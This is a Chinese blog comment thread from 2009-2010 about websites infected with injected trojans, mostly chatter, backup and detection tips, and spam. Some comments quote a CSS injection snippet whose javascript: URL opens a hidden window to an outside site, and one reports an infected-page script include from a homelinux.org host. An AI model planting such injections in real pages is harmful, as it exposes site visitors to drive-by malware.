卢松松博客

学习了，网站的安全问题是各位站长头痛的问题啊

学习了！谢谢分享！

前不久我网站的主机商推出一个服务，就是锁定文件，锁定以后就不允许FTP访问。自己想修改的话也就只有解锁，这个功能实在是非常有用

可以用365uptime.com 在线监控的，网站一旦被挂马了，马上会发手机短信，emial 报警通知你的

昨天还看到一个帖子说css挂马
使用的body 背景图 t 来挂的。。。

卢松松 于 2010-3-18 20:47:41 回复

这方法够绝的

呃，想不到第一个搜到的就是你的博客，哈，恭喜了

卢松松 于 2009-11-26 16:32:32 回复

搜的什么关键字啊？网页挂马吗？

短歌行 于 2010-2-10 13:13:16 回复

放狗找“网站挂马”，你排在第1名。

呵，还是老卢写得详细全面，学习学习了```

博主对这方面挺有研究的嘛!关键还是要做好网站的备份

卢松松 于 2009-10-18 15:42:42 回复

对，网站备份很重要的

主要还是防止程序漏洞，防注入。
其他，比如空间那边的问题，就要看你的RP了。。。
上次我的空间那边，ARP攻击被搞了三次，，，

卢松松 于 2009-9-21 20:50:46 回复

你那个空间商都倒霉的哦

这些木马真的太讨厌了，我们的网页天天被挂马，每天上班第一件事就是用数据库恢复，烦死了，不知这个方法管不管用？

恩，我想我还没有到需要被挂马的高度

嗯，学习了。

厄，这个是好东西

期待第一个挂马的……

找挂马代码是最辛苦的了,不过用ZB程序的查找挂马代码应该容易些吧!!!检测木马,我的空间提供商那有24小时检测的东西.

我的站经常性的有人挂马，可是我就是成功不了．

长知识了robots.txt这个文件一般是用来对seo的，没想到它的用途不止这些啊~

真晕.昨天还好好的,今天就,,

哎...被人挂了木马,,

速求助.....

qq:332778993
湖南兴诚养殖场

http://www.hnxingcheng.com

卢松松 于 2009-8-3 11:31:43 回复

看了你的网站都打不开

兴诚 于 2009-8-3 11:52:20 回复

我现在正清空自己的空间,,

哎..没办法,正想办法恢复前几天的备份的,

不拓有什么办法可能以后出现同样的事

我下载到本地看了会里面好多*.asp文件中都有
http://asdonn.homelinux.org/asd.js?s=201&col=ffdd00

唉，一次都没有被挂过！如果说被人挂马就代表网站做的成功了，那我还真想被挂一下。。。

现在挂的马很厉害。

人气真旺，不错的地方，以后常来



连锁酒店

借贵地引蜘蛛
丰田RAV4

是不是PHP比较安全一些？ASP的感觉很容易就挂了马子了。

挂与被挂，this is a question!

楼真高 我恐高

能被检测出来的，都是新手所为，高手挂上去的马，呵呵，大家就慢慢地给它喂养成人吧：）~

很实用的工具

查也查了杀也杀了，可是过几天又出现了！没办法了，就这么着吧！

我根本就没装酷狗播放器，现在好像次数少了，不过有时还是会弹出来！

卢松松 于 2009-7-20 15:45:23 回复

那可能确实中了什么木马，查杀一下吧！

蛮强的...这么多人评论啊..

FF是跟Google联动的，如果Google检测到某网站含有恶意内容，在使用FF浏览的时候会得到提示。当然，如果不放心的话，除了杀毒软件，也可以装个McAfee的SiteAdvisor，这样在浏览的时候也会实时进行提示。

卢松松 于 2009-7-19 15:05:02 回复

不仅仅是火狐浏览器吧，无论什么内核的浏览器，用google搜索都会有提示的！

Bronco 于 2009-7-19 16:52:49 回复

我的意思是在浏览网页的时候，比如你输入一个网址打开，如果这个网站在黑名单里，FF会给你提醒，建议你不要打开。
ps一句，为什么我不能回复管理员的留言呢？

卢松松 于 2009-7-20 15:44:34 回复

你这不是已经回复我的留言了吗？呵呵！
FF的功能确实不错，我已经把FF设置为我的默认浏览器了！

呵呵。头2年网页挂马可是太疯狂了。。断断续续的。。到现在也还好。

卢松松 于 2009-7-19 15:06:18 回复

现在大家的防范意识都加强了，而且对我这些普通电脑，都没有诱惑了

看完这篇文章。从头到尾。。。忽然想起了两种东西。一种是“暗战”。虽然暗战这部片子没有看过多少。不过敌我之间相互渗透的精神却理解的很精准。木马也是这样。我中有你。你中有我。。。。还有一种就是“无间道”。。。。。

马克思说过：世界上万事万物都是有联系的。从木马的角度来说，除木马病毒以外，其他任何东西都是木马病毒。不知道谁能理解虾说的这句话。

卢松松 于 2009-7-20 15:37:38 回复

有一种不是木马的木马侵蚀的广大网民，只是我们没有把他列为木马行列而已！

卢松松 于 2009-8-5 11:49:50 回复

本评论以收录到“感谢有你，博客七月精彩评论！”中。

马上转回去检查一下。。。

路过……
只帮别人做站，自己不弄……
帮人做好了也不负责维护……
(*^__^*)...嘻嘻

也不知道黑客们喜欢在什么样的站上挂马...

上联：这里的楼房高又高
下联：那里的评论多又多
横批：博客中的沙发
不要见笑呵！呵！

卢松松 于 2009-7-20 15:30:54 回复

我坚信，你这条评论必定入选下期博客精彩评论。

卢松松 于 2009-8-5 11:48:36 回复

本评论以收录到“感谢有你，博客七月精彩评论！”中。

网站被挂马，很麻烦的一件事情。

过来逛逛

想创建一个robots.txt，正好学习下！

这个不错，实用性强~

那个macfee
的其实不错，不过好像有点影响网速
个人小博客没人会挂马吧？

卢松松 于 2009-7-20 15:28:17 回复

当你的博客快成功的时候就会被挂马！

我是104楼。。。- -！

挂马呀。。。。

呵呵。还没遇到过网页挂马的事情。

卢松松 于 2009-7-20 15:26:57 回复

过一年半载的就会出现了，嘿嘿，那也是你成功的开始！

挂马后，我一般是备份博客模板，当检测到博客被挂马时，就把备份模板覆盖回去就可以了。

卢松松 于 2009-7-20 15:26:13 回复

数据库也需要多多备案啊 尤其是用虚拟空间的！

自我检查一下 邮箱打错了

自我检查一下

建议的第七条非常好。

挂马盛行，X星表示“用我X星者得永生~~~”
趁火打劫的意思~~~~

卢松松 于 2009-7-20 15:24:43 回复

用我X星者得永生~~~
这句话很熟悉啊。是什么呢？

有的是空间服务器被挂马，自己是没办法清除的

卢松松，看来你得设计个网易效果了。盖楼啊。

卢松松 于 2009-7-20 15:23:12 回复

楼盖不起来，而且盖楼显得版面会很乱，所以没有这个打算！

松松,我跟你说,不是我吓唬你啊….你…..你被点名了,虽然我觉得:游戏是好游戏,这题目有点太无聊…但为了能继续，我还是完成了题目,并勇敢地点了你的名..哈~

卢松松 于 2009-7-20 15:20:57 回复

嘿嘿，我准备把点名游戏的回答放在另外一个博客中！

被挂是郁闷的……

要学习下，以前就被人挂过

归纳的还不错

哇，你的博客不错啊，从你在我的博客上的评论上得知此处。
两个月前我的博客PR也有4呢，但这几个月太忙没更新，变为零了。
挺喜欢这个博客：）

妖狐闪现 于 2009-7-14 22:47:40 回复

晕，从4变成0？太恐怖了！

博译论 于 2009-7-15 0:20:23 回复

我是经历了131

博译论 于 2009-7-15 0:26:16 回复

去实践一下，先从半荒芜的网站下手挂马，再自行解马

世纪之光 于 2009-7-15 9:12:33 回复

有波动才好啊，像我的两年一直是2，真他娘的郁闷。

hahn 于 2009-7-16 11:10:24 回复

这个4到0是我经历的第二次了，因为忙的原因，前一次也是数月未更新，流量大减，后来就变0了。之后更新恢复了，也总去其他博客那里留言访问，不久也就恢复原来的PR值了。

卢松松 于 2009-7-20 15:08:53 回复

以前我对独立博客一直不重视，所以对PR没有什么概念。直到今年年初才买了个独立域名做博客。

有点怕了。。。不知道偶的博客有没有成为“马坊”

这个不错，转给给公司技术看看。。

你的人气真好！！！！

西小西被挂三次咯~~

卢松松 于 2009-7-20 15:04:02 回复

难道你成功了三次？

人气啊！几天，就1400

一个很不错的毛网前两天被挂了木马，哎~~~

卢松松 于 2009-7-20 15:03:11 回复

下次搜索黄色网站用google搜索，不仅没病毒，而且供你选择的网站也多！

图片挺猛，一匹马。哈哈

卢松松 于 2009-7-20 15:00:44 回复

是黑马，据另外一位网友说，这匹还还带着诡异的笑容！

我这里很棒 没病毒
不过我所去过的黄色网站全部挂马

卢松松 于 2009-7-20 14:58:48 回复

下次搜索黄色网站用google搜索，不仅没病毒，而且供你选择的网站也多！

写得很详细,很有水平哦,感觉博主不但人缘好,而且技术也超强呀.

卢松松 于 2009-7-20 14:57:43 回复

做技术的不能整天埋头写代码，多多交流才是真的！

好博客啊！这么多评论，好生羡慕。本老太自愧不如啊！

卢松松 于 2009-7-20 14:54:00 回复

勤奋、专一、坚持能做到的话，你也一样！

所谓 道高一尺 魔高一丈 ！！！ 让攻击 来的更猛烈些吧 哈哈 开玩笑哈！

卢松松 于 2009-7-20 14:51:24 回复

当你的网站被挂马的时候说明你的网站离成功不远了！

想要進入你的博客的留言欄還真得耐著性子慢慢滴往下拉滾動條阿。。。
我也說呢，怎麼會被掛馬呢？保管好密碼什麼的也不至於阿。。。
“現在的社會風氣實在太坏了”，不得不防阿

卢松松 于 2009-7-20 14:49:40 回复

这样，每篇文章信息栏里有一个“我来说两句”点击这个可以快捷到评论窗口！

这名好熟啊，好像嘀咕上见过

卢松松 于 2009-7-20 14:47:29 回复

我在嘀咕上也有号，用过嘀咕一段时间

呵呵，用JS挂马已经很落后了，利用windows的GDI漏洞的图像挂马和ActiveX漏洞的挂马才是要命的哦

卢松松 于 2009-7-20 14:45:04 回复

图像挂马和ActiveX漏洞，怎么使用呢？

这个应该学学~

我是来检查你今天被挂马了没

卢松松 于 2009-7-20 14:43:56 回复

检查出来没有嘛！

52tool 于 2009-7-20 14:58:41 回复

检查出来了，“如果觉得我的博客还不错”就是，因为老让我们不自觉地“猛击”此处。

说马吧，还是电信的马厉害，每次开网站的时候都会弹电信的广告．其次就是大小姐了，马做的也不错．一般咱这小博客，没有几个人会在意．松松的网站连广告吼没加．挂了也没用．

卢松松 于 2009-7-20 14:41:02 回复

宽带运营商的马确实很厉害，仿不住，你观察的还挺仔细的嘛！目前还没有做广告的想法

最BT的挂马还是电信、网通之类的运营商，每天至少要遇到十来次运营商的强奸式广告，，那个才叫猛啊。。。哎。。

卢松松 于 2009-7-19 16:57:05 回复

是呢，这种挂马方式我们都无法预防的 哎！

学习，怕怕

我总是在地下层留言：小站一般不怎么会给挂马

卢松松 于 2009-7-20 14:35:20 回复

当你的网站被挂马的时候，说明你成功了！

呵呵，删除了登陆链接，只要在网址输入地方键入登陆地址就可以了。是不是登陆网址可以自己起一个只有自己知道的地址啊？

卢松松 于 2009-7-19 16:52:22 回复

是可以的，有些程序是支持更改后台目录文件的！

好厉害！

(3)：不要在前台网页上加注后台管理程序登陆页面的链接。

呵呵，这个很有用，我去把我的删掉。

小鬼 于 2009-7-14 23:58:38 回复

话说没什么用、、、除非你能把后台地址改了，否则别人一样知道你的后台地址

不错,支持下~刚GG了一下,没有提示安全问题,嘿...

要是都没有木马.我们这次人都要下岗了.

卢松松 于 2009-7-19 16:49:44 回复

哥们你的职业很不错啊！

使用php的安全性还是比较高的.不怕.

其中介绍的几个网站很不错

McAfee SiteAdvisor 有点意思,正在研究...

越夜 于 2009-7-15 15:03:52 回复

偷懒,昨天怎么可能没有更新...

卢松松 于 2009-7-19 16:48:44 回复

更新了，回来看看我吧！

唉，好久没挂马了，你这图片还真雷人，那马嘴还微笑呢，我真无语。。。

卢松松 于 2009-7-19 16:41:45 回复

我原本以为这匹马很帅气！

我一般都是通过网页源文件去判断，个人觉得PHP相对安全，以前ASP经常被挂马，都把我弄成反网页木马的高手了。
不过看源文件发现被挂马，不一定是服务器端的原因，像ARP之内在客户端的攻击，同样可以导致客户端浏览器强制挂马，我就遇到过。

卢松松 于 2009-7-19 16:38:41 回复

ARP之内在客户端的攻击。是如何攻击的呢？

预防为主~~~

被挂木马就像在人的后面按上了尾巴——还是那种随便乱甩的尾巴~

最后的八个建议很不错

每一个都值得认真去做~

恩 很不错啊 及时 前不久我一个网站就被挂了JS木马，到现在还不知道哪里有漏洞！

呵呵，像我的小博客没人会那么无聊去挂马，到是松松的博客要小心一下!

卢松松 于 2009-7-19 16:34:24 回复

当你的站被别人挂马的时候，说明你成功了~

楼主 你的网页真好看
收藏了

我有一个站，被挂了半年，怎么都解决不了，也没心思去弄，

后来终于想到一个好办法，把关给站了。他就不存在了。呵呵。

dcp 于 2009-7-14 23:27:05 回复

真JB逗。 “把关给站了"``
你把说给话倒了！

最让人头痛的还是服务器被挂马，或者被劫持。

左岸读书 于 2009-7-14 9:05:53 回复

这个有同感~

真是需要小心防范

所以说最好认识几个黑客界的朋友，挂马了立马给对方挂回去……

貌似我就只用过google检测

卢松松 于 2009-7-20 14:56:51 回复

googl检测有一个弊端，如果不收录或者被拔毛的网站是无法检测的

学习了，不过我觉得我的站应该不会被挂马吧，因为我的站没价值啊

几个链接不错，收了~

又长见识了

这么一说，我还真的怀疑俺们的站点 “中奖” 了，因为有时候页面总是不能够完整显示，在页面左下方显示“页面错误”等字样。不知道这是不是 症状？

看来，需要按照老大的方法，解决这个问题啦！呵呵~~

卢松松 于 2009-7-20 14:55:32 回复

不是被黑，一般你改过原模板主题的时候，JS，或者语法错误，IE就会提示的。我做网页的时候经常会出现这样的情况。

挂马的方式很多种的 不好防范的 俗话说道高一尺魔高一丈……

安全还是重要的

最重要是不泄露帐号和设置好目录权限

写的好专业，去查查。防患未然

我的破站人家都不稀罕挂

卢松松 于 2009-7-19 15:50:06 回复

FPD200-59917-97447-41275

呵呵,确实,不过好像讲的都是ASP吧,PHP呢?

Google可不喜欢被挂马的网站....他会在搜索中提升此网站有马

万幸。我的也上好好的
呵呵
希望这种馅饼还是不要来

卢松松 于 2009-7-19 15:48:38 回复

当你的站被别人挂马的时候，说明你成功了~

今天服务器被挂马了 就为了卖几个链接 我都不忍心称这样的人是黑客
放链接就放链接把 还把我网页搞成乱码！！！！

卢松松 于 2009-7-19 15:40:48 回复

此“黑客”不会布局页面，建议他学习一下如何从零学起DIV+CSS

呵呵，这些方法不错啊，

我还没挂过马

卢松松 于 2009-7-19 15:38:52 回复

当你的站被别人挂马的时候，说明你成功了~

挂马么？
谁在我破博客挂马有啥用

卢松松 于 2009-7-19 15:37:44 回复

当你的站被别人挂马的时候，说明你成功了~

越来越发现你是一个牛人了，佩服。

卢松松 于 2009-7-19 15:35:53 回复

只要肯学，这些基础挂马知识谁都能学会的！

不错。估计我是用不着了。

收藏一下，最近发现博客有点怪怪的，要好好检查一下了

我还以为我很快呢……
又20多楼了！

yoja 于 2009-7-13 21:57:31 回复

の，是30楼

我的天啊！下次发文章前一定要先通知下我，要不然偶末沙发了！

当我的站被别人挂马的时候，说明我成功了~

卢松松 于 2009-7-19 15:31:59 回复

说的对。挂马之日，就是成功的开始！

这个问题上bsp的好处就出来了
不过学着怎么防范和检测总是有用的

此物有用,收藏

太多了，简直是防不胜防。我先去看看我家后门关了没~

好想以前用Z-Blog的时候试过.....但很快被解决了

应该没有黑客对我的小站有兴趣，哈哈~

卢松松 于 2009-7-19 15:27:46 回复

你做的有点规模，有利用价值的时候就是挂马的时候 嘿嘿

挂马是在太麻烦了，费时又费力的……

卢松松 于 2009-7-19 15:26:17 回复

会者不难嘛。很多人都好这一口呢！

我感觉我的网页被挂马上，打开博客老是顶部跳出一个大广告！偶尔右下角会出现！

卢松松 于 2009-7-19 15:25:40 回复

按照文章中的方法试试，如果还是出现弹窗，试试把酷狗播放器关掉

这篇文章，我直接保存到本地了。
太牛了，查查去。

妖狐闪现 于 2009-7-13 19:39:09 回复

我决定以后在卢松松这里不再抢沙发板凳，改抢整数！抢666，抢888！

小鬼 于 2009-7-13 19:58:07 回复

。。。我对你。。。。

Lxhome 于 2009-7-14 12:43:22 回复

下次不敢了

卢松松 于 2009-7-19 15:22:14 回复

大哥，您太抬举人了吧！

卢松松 于 2009-8-5 11:49:02 回复

本评论以收录到“感谢有你，博客七月精彩评论！”中。

这个一定来学习。。
先顶起看。。

有的是假像，局域网受arp攻击时。360会提示网站挂马的信息。

卢松松 于 2009-7-19 15:21:27 回复

所以就出了局域网防护工具！

我一般是搜索替换来查找挂马

分析得很到位

网址不能使https啊

曾经因为服务器的问题被挂个马，当时还算容易的就删除了，是啊，要特注意以防被挂马！

卢松松 于 2009-7-19 15:19:35 回复

和你一样，我的网站也遇到了，不过很容易就删除了！

还没碰到过，小站也会有人无聊去挂马？

这个问题值得深入学习一下，我也遇到过。

呵呵，学习了

真不错，我还不知问谁好呢，你这儿就给答案了

卢松松 于 2009-7-19 15:18:20 回复

很幸运，我中奖了，多谢关照！

学会这个，可以去给别人挂马了。嗯。

学会这个，可以去给别人挂巴了。嗯。

卢松松 于 2009-7-19 15:17:50 回复

嗯，小子，你给了我一个启示，下次我打算用实战写一篇如果挂马的文章。

嘉程在上面抢了两个，太不像话了，要严厉打击，话说现在被挂黑链的比较多。

小明猪 于 2009-7-13 17:15:56 回复

什么是挂黑链的？

小明猪 于 2009-7-13 17:17:16 回复

四楼正解，我刚看到标题第一个想到的就是这个

卢松松 于 2009-7-19 15:16:59 回复

黑链也叫隐藏链接是私自在别人的网站上挂自己的连接 .

这边的人气跟我的SEO博客真的是不可同日而语啊~~

卢松松 于 2009-7-19 15:14:35 回复

SEO太流行。
坚持，勤奋，专一，你也会一样的！

这个很有用，以前一直没在意过

卢松松 于 2009-7-19 15:10:56 回复

防范于未然嘛！

话说还有CSS挂马法
Body{

　　background-image: url('javascript:document.write("")')

　　}
-------------------------------
Body{

　　background-image: url(javascript:open(' http://www.lyzsoft.cn '，'newwindow'，'height=0， width=0， top=1000， left=0， toolbar=no， menubar=no， scrollbars=no， resizable=no，location=no， status=no'))

　　}

芒果 于 2009-7-13 22:37:41 回复

头回听说，长了见识了。

chouray 于 2009-7-14 14:43:45 回复

..................回火星 地球物种马很强悍

妖狐闪现 于 2009-7-14 22:47:56 回复

哈哈，小鬼果然是高手！

小鬼 于 2009-7-14 23:54:08 回复

话说我是冥王星人来的，路过地球打酱油回家炒菜的
= =

卢松松 于 2009-7-19 15:09:21 回复

看来小鬼对挂马很熟悉啊，是不是做这个的？

小鬼 于 2009-7-19 19:32:03 回复

初中的时候研究过

卢松松 于 2009-7-20 14:52:52 回复

看来你也好这一口啊，搞黑客技术有没有收获呢？

小鬼 于 2009-7-20 20:47:17 回复

现在不怎么搞了，搞的话也是道德黑客

卢松松 于 2009-8-3 11:34:46 回复

是不是应该叫红客呢？

小鬼 于 2009-8-3 11:37:03 回复

呵呵，现在什么都不是了，学生一个，正常人一个

= =赶紧地板，广告位出租

在这里抢沙发好难啊。
我得赶紧去查查了，不知道自己的有没有被挂马呢

终于有次沙发了

妖狐闪现 于 2009-7-13 19:38:18 回复

wow，被你抢到了～